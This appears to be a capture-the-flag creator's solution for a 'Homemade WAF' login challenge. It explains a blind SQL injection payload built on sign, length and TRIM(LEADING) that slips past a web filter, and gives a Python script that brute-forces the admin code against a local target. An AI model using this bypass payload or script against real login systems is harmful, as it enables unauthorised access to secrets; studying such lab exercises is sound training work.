China - Homemade WAF (Creator Solution)
===========

## Description

A weblogin page with an admin code to steal.

![alt text](img/lr5_log.png)


## WHAT
Like the previous one but with a hardened WAF.

One of the payload which bypasses the WAF:

if(sign(length(TRIM(LEADING(0x{}{})from(code)))-length(code))+1,1,code)


## HOW

The trick here is the use of the wombo-combo sign(length(TRIM(LEADING.
The fonction trim with the parameter LEADING allow us to delete the starting substring if it matches our input.
If it deletes the substring, it means that it exists and the string length will be different.

The idea is to substract the length of the string with the length of the string after the trim function.

The sign function works like this : 

    If number < 0, then sign returns -1.
    If number = 0, then sign returns 0.
    If number > 0, then sign returns 1.

With this last trick we can know if the length string has been changed after the trim function.

Basic example:

We still include the logic of 2 pass reading flag (Left-Right R-L) in the injection and got the flag.
![alt text](img/lr5_flag.png)

## Script

```python
#!/usr/bin/python3
# -*-coding:Utf-8 -*
import requests,codecs,sys

url="http://127.0.0.1/login_rush_V5/index.php"
payload="if(sign(length(TRIM(LEADING(0x{}{})from(code)))-length(code))+1,1,code)"
Success_string="Fake"#r (Faker :D)
brut=""

list_number_x=["{:2x}".format(ord(n)) for n in "0123456789"]

while 1:
    for n in list_number_x:
        send={"name":"admin","code":payload.format(brut,n)}
        if(str(requests.post(url,data=send).content).find(Success_string)!=-1):
            brut=brut+str(n)
            arg1=0
            break
        if n==list_number_x[-1]:
            print("\nCODE :  "+codecs.decode(brut, "hex").decode("utf-8"))
            sys.exit()
        print("\rCODE (HEX): "+(brut),end="")

```



Info & questions : Azphereax#9449 (Discord)

